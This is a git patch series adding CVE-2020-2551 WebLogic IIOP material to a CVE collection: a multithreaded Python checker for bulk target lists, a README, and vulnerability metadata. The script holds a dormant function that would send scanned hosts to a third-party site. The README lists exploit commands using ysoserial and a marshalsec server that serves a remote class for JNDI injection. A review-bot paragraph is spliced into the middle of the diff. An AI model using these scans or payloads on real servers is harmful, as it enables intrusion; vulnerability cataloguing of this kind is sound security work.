From 55647a003370b038f4b62cd56ebacc90881767db Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:38:13 +0000 Subject: [PATCH 01/17] update openkylin_list.yaml. Signed-off-by: Cryptocxf
--- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401df..d5e85d49 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,8 @@ cve:
 - CVE-2019-3396
 - CVE-2021-26084
 - CVE-2022-26134
+ weblogic:
+ - CVE-2020-2551
 polkit:
 - CVE-2021-4034
 vim:
-- Gitee
From 5d46d4f12248f218d59082bd3564ca90c560bb22 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:39:50 +0000 Subject: [PATCH 02/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20weblogic?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/.keep
diff --git a/cve/weblogic/.keep b/cve/weblogic/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From f2210a74892f4d86498ff61bd3764ae45bb19f5c Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:40:17 +0000 Subject: [PATCH 03/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202020?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/.keep
diff --git a/cve/weblogic/2020/.keep b/cve/weblogic/2020/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From a739ded5ce0091b5b12d6c948fa5653c6496fe6d Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:41:25 +0000 Subject: [PATCH 04/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/yaml/.keep
diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From ef54690326f2b8f75e0387327f06de35d2faff50 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:02 +0000 Subject: [PATCH 05/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-2551?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/CVE-2020-2551/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/CVE-2020-2551/.keep
diff --git a/cve/weblogic/2020/CVE-2020-2551/.keep b/cve/weblogic/2020/CVE-2020-2551/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From d7f80d6384baad9c89990fe53db12f2df2340fcd Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:17 +0000 Subject: [PATCH 06/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/.keep
diff --git a/cve/weblogic/.keep b/cve/weblogic/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 1fd3d6a185528b159b62689013b07e06bb2bde14 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:42:27 +0000 Subject: [PATCH 07/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/2020/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2020/.keep
diff --git a/cve/weblogic/2020/.keep b/cve/weblogic/2020/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From c5aa9389f8dcaa5ab1cc3144bcd935900c752378 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:45:22 +0000 Subject: [PATCH 08/17] update CVE_PoC
Signed-off-by: Cryptocxf
--- cve/weblogic/2020/yaml/CVE-2020-2551.py | 119 ++++++++++++++++++++++++ cve/weblogic/2020/yaml/README.md | 114 +++++++++++++++++++++++ 2 files changed, 233 insertions(+) create mode 100644 cve/weblogic/2020/yaml/CVE-2020-2551.py create mode 100644 cve/weblogic/2020/yaml/README.md
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.py b/cve/weblogic/2020/yaml/CVE-2020-2551.py
new file mode 100644
index 00000000..c96ba6f7
--- /dev/null
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket,argparse,sys,requests,os,atexit
+from urllib.parse import urlparse
+from multiprocessing.dummy import Pool as ThreadPool
+"""
+only check CVE-2020-2551 vuls
+Twitter: @Hktalent3135773
+Creator: 51pwn_com
+Site: https://51pwn.com
+How use:
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+cat ../T3.txt rst/T3.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+cat ../T3.txt rst/*.txt gy/*.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+"""
+g_f = None
+
+bDebug=False
+g_oNRpt={}
+def log(e):
+ if bDebug:
+ print(e)
+def doThreads(fnCbk,lists,nThreads=64):
+ pool = ThreadPool(nThreads)
+ pool.map(fnCbk,lists)
+ pool.close()
+ pool.join()
+
+def checkOnline(url,cbkUrl):
+ try:
+ requests.post('http://51pwn.com/CVE-2020-2551/',data={'url':url,cbkUrl:cbkUrl},timeout=(5,9))
+ except Exception as e:
+ log(e)
+ pass
+
+def doSendOne(ip,port,data):
+ sock=None
+ res=None
+ s=ip+':'+str(port)
+ try:
+ if 0 == len(ip) or s in g_oNRpt:
+ return
+ g_oNRpt[s]='1'
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.settimeout(7)
+ server_addr = (ip, int(port))
+ sock.connect(server_addr)
+ sock.send(data)
+ res = sock.recv(10)
+ if b'GIOP' in res:
+ #checkOnline(ip+':'+str(port),'http://yourSite/?target={}&rst={}')
+ return True
+ except Exception as e:
+ log(s)
+ log(e)
+ pass
+ finally:
+ if sock!=None:
+ sock.close()
+ return False
+g_bPipe=False
+def doOne(url):
+ global g_bPipe,g_f
+ if not 'http' in url:
+ url='http://'+url
+ oH=urlparse(url)
+ a=oH.netloc.split(':')
+ port=80
+ if 2 == len(a):
+ port=a[1]
+ elif 'https' in oH.scheme:
+ port=443
+ if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')):
+ print('found CVE-2020-2551 ', oH.netloc)
+ g_f.write(oH.netloc + "\n")
+ g_f.flush()
+ elif g_bPipe == False:
+ print('not found CVE-2020-2551 ', oH.netloc)
+
+def doPipe():
+ global g_bPipe
+ g_bPipe=True
+ buff = ''
+ a=[]
+ while True:
+ buff = sys.stdin.readline()
+ if not buff:
+ break
+ if buff.endswith('\n'):
+ szTmpCmd = buff[:-1]
+ szTmpCmd=szTmpCmd.rstrip()
+ buff = ''
+ if not szTmpCmd:
+ break
+ a.append(szTmpCmd)
+ doThreads(doOne,a)
+
+def exit_handler():
+ global g_f
+ g_f.close()
+atexit.register(exit_handler)
+szFileOn = os.path.dirname(os.path.abspath(__file__))+ "/CVE-2020-2551.txt"
+if __name__=='__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u","--url",help="http://xxx.xxx.xxx:7001/")
+ parser.add_argument("-e","--pipeCheck",help="pipe check is Ok,thread 32",action="store_true")
+ parser.add_argument("-o","--out",help="out file name",default="CVE-2020-2551.txt")
+ args = parser.parse_args()
+ if args.out:
+ szFileOn=args.out
+ g_f = open(szFileOn,"a+")
+
+ if args.url:
+ doOne(args.url)
+ if args.pipeCheck:
+ doPipe()
\ No newline at end of file
diff --git a/cve/weblogic/2020/yaml/README.md b/cve/weblogic/2020/yaml/README.md
new file mode 100644
index 00000000..4253d57a
--- /dev/null
+++ b/cve/weblogic/2020/yaml/README.md
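Review bot: `if b'GIOP' in res:` in doSendOne only proves that the peer answered the GIOP LocateRequest, so `print('found CVE-2020-2551 ', oH.netloc)` in doOne fires for every reachable IIOP listener, including servers that already carry the January 2020 CPU fix, because that fix changes the deserialization blacklist check rather than whether the NameService replies. Label the result as exposure rather than vulnerability, e.g. `print('IIOP/GIOP listener reachable, CVE-2020-2551 candidate (verify patch level) ', oH.netloc)`, or state in the module docstring that this is a reachability check and patch status must be confirmed from the CPU level. exit_handler is registered at import time while g_f is still None, so any run that exits before the `__main__` block opens the output file (argument error, import from another module) raises AttributeError inside the atexit hook; guard it with `if g_f is not None: g_f.close()`. checkOnline would POST every scanned host to a third-party site over plain HTTP, and its `data={'url':url,cbkUrl:cbkUrl}` uses the callback URL itself as a dict key instead of the string 'cbkUrl'; since its only call is commented out, dropping the function removes a dormant target-list leak from a script other people will run.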
@@ -0,0 +1,114 @@
+Twitter: [@Hktalent3135773](https://twitter.com/Hktalent3135773)
+[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=myhktools%20-%20Automated%20Pentest%20Recon%20Scanner%20%40Hktalent3135773&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2Fhktalent%2Fmyhktools)
+[![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773)
+
+# 0、how get pro exploit tools?
+see https://github.com/hktalent/CVE-2020-2551/issues/5
+
+# 1、CVE-2020-2551
+CVE-2020-2551 poc exploit python example
+keys:
+GIOP corba
+image
+
+
+### How use
+```
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+# now result to data/*.txt
+java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+```
+
+### t3, t3s, http, https, iiop, iiops
+```
+service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
+service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+```
+
+## poc
+image
+
+
+
+# 2、your know your do
+```
+{
+ "ejb": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ],
+ "mgmt": {
+ "MEJB": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+ },
+ "javax": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "jdbc": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "db_xf": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "mejbmejb_jarMejb_EO": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "weblogic": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+}
+```
+
+# 3、ejb
+```
+/bea_wls_internal/classes/mejb@/
+
+weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
+```
+
+# 4、jta
+```
+x.lookup("ejb/mgmt/MEJB").remove(jta);
+```
+# 5、logs
+- fix rmi use Jdk7u21 payload,not work for remote jdk8
+don‘t use
+```
+java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'
+```
+use,XXclass.class from jdk6 build
+```
+java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099
+```
+
+# 6、thanks for
+@[r4v3zn](https://github.com/r4v3zn)
+@[0nise](https://github.com/0nise)
+[![Top Langs](https://profile-counter.glitch.me/hktalent/count.svg)](https://51pwn.com)
-- Gitee
From e16223aa7ec592026fc3569549f6ab812ba8a52b Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:45:35 +0000 Subject: [PATCH 09/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/weblogic/2020/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/weblogic/2020/yaml/.keep
diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 390727c7d0882e38f92f43a7320fb0beaedfce0e Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:22 +0000 Subject: [PATCH 10/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/yaml=20=E4=B8=BA=20cve/weblogic/2020/CVE-2020-25511?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/{yaml => CVE-2020-25511}/CVE-2020-2551.py | 0 cve/weblogic/2020/{yaml => CVE-2020-25511}/README.md | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{yaml => CVE-2020-25511}/CVE-2020-2551.py (100%) rename cve/weblogic/2020/{yaml => CVE-2020-25511}/README.md (100%)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py
similarity index 100%
rename from cve/weblogic/2020/yaml/CVE-2020-2551.py
rename to cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py
diff --git a/cve/weblogic/2020/yaml/README.md b/cve/weblogic/2020/CVE-2020-25511/README.md
similarity index 100%
rename from cve/weblogic/2020/yaml/README.md
rename to cve/weblogic/2020/CVE-2020-25511/README.md
-- Gitee
From e980a96b06a77d4284cff134e2554b389715d24e Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:40 +0000 Subject: [PATCH 11/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/CVE-2020-2551=20=E4=B8=BA=20cve/weblogic/2020/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/{CVE-2020-2551 => yaml}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{CVE-2020-2551 => yaml}/.keep (100%)
diff --git a/cve/weblogic/2020/CVE-2020-2551/.keep b/cve/weblogic/2020/yaml/.keep
similarity index 100%
rename from cve/weblogic/2020/CVE-2020-2551/.keep
rename to cve/weblogic/2020/yaml/.keep
-- Gitee
From fa1b93a1f9d29b56474c8cc5d7f066a6111602b0 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:46:52 +0000 Subject: [PATCH 12/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/CVE-2020-25511=20=E4=B8=BA=20cve/weblogic/2020/CVE-2020-?= =?UTF-8?q?2551?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- .../2020/{CVE-2020-25511 => CVE-2020-2551}/CVE-2020-2551.py | 0 cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/README.md | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/CVE-2020-2551.py (100%) rename cve/weblogic/2020/{CVE-2020-25511 => CVE-2020-2551}/README.md (100%)
diff --git a/cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
similarity index 100%
rename from cve/weblogic/2020/CVE-2020-25511/CVE-2020-2551.py
rename to cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
diff --git a/cve/weblogic/2020/CVE-2020-25511/README.md b/cve/weblogic/2020/CVE-2020-2551/README.md
similarity index 100%
rename from cve/weblogic/2020/CVE-2020-25511/README.md
rename to cve/weblogic/2020/CVE-2020-2551/README.md
-- Gitee
From 2bfac19013cebaaa5558e95295d7000a9f1807b9 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 08:47:28 +0000 Subject: [PATCH 13/17] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogi?= =?UTF-8?q?c/2020/yaml/.keep=20=E4=B8=BA=20cve/weblogic/2020/yaml/CVE-2020?= =?UTF-8?q?-2551.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit
--- cve/weblogic/2020/yaml/{.keep => CVE-2020-2551.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/yaml/{.keep => CVE-2020-2551.yaml} (100%)
diff --git a/cve/weblogic/2020/yaml/.keep b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
similarity index 100%
rename from cve/weblogic/2020/yaml/.keep
rename to cve/weblogic/2020/yaml/CVE-2020-2551.yaml
-- Gitee
From 170b8029aa32636a623c3eee000644bd10d73ec7 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Wed, 22 Mar 2023 09:15:24 +0000 Subject: [PATCH 14/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf
--- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
index e69de29b..49a3ea4e 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-2551
+source: https://github.com/hktalent/CVE-2020-2551
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: high
+ description: |
+ 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ - https://www.oracle.com/security-alerts/cpujan2020.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-2551
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020,Weblogic,反序列化
\ No newline at end of file
-- Gitee
From 76e6b84ffe3ee9fcd15a43512278e37f7605c579 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Thu, 23 Mar 2023 07:02:00 +0000 Subject: [PATCH 15/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf
--- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
index 49a3ea4e..a676c2c5 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -2,18 +2,19 @@ id: CVE-2020-2551
 source: https://github.com/hktalent/CVE-2020-2551
 info:
 name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
- severity: high
+ severity: critical
 description: |
 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
 scope-of-influence:
 weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
 reference:
 - https://www.oracle.com/security-alerts/cpujan2020.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2020-2551
- cwe-id: None
+ cwe-id: NVD-CWE-noinfo
 cnvd-id: None
 kve-id: None
- tags: cve2020,Weblogic,反序列化
\ No newline at end of file
+ tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
-- Gitee
From 2bdc5007747b50d7e94ece8c74fbf22280a1a379 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Mon, 27 Mar 2023 07:08:05 +0000 Subject: [PATCH 16/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf
--- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
index a676c2c5..abc2967c 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -11,10 +11,10 @@ info:
 - https://www.oracle.com/security-alerts/cpujan2020.html
 - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
 classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2020-2551
- cwe-id: NVD-CWE-noinfo
+ cwe-id: NVD-CWE-None
 cnvd-id: None
 kve-id: None
 tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
-- Gitee
From 1eaff881dbcc9580b0a7be41be970495c4ca7541 Mon Sep 17 00:00:00 2001 From: Cryptocxf Date: Mon, 27 Mar 2023 07:37:47 +0000 Subject: [PATCH 17/17] update cve/weblogic/2020/yaml/CVE-2020-2551.yaml. Signed-off-by: Cryptocxf
--- cve/weblogic/2020/yaml/CVE-2020-2551.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
index abc2967c..a1540092 100644
--- a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -14,7 +14,7 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2020-2551
- cwe-id: NVD-CWE-None
+ cwe-id: None
 cnvd-id: None
 kve-id: None
 tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
-- Gitee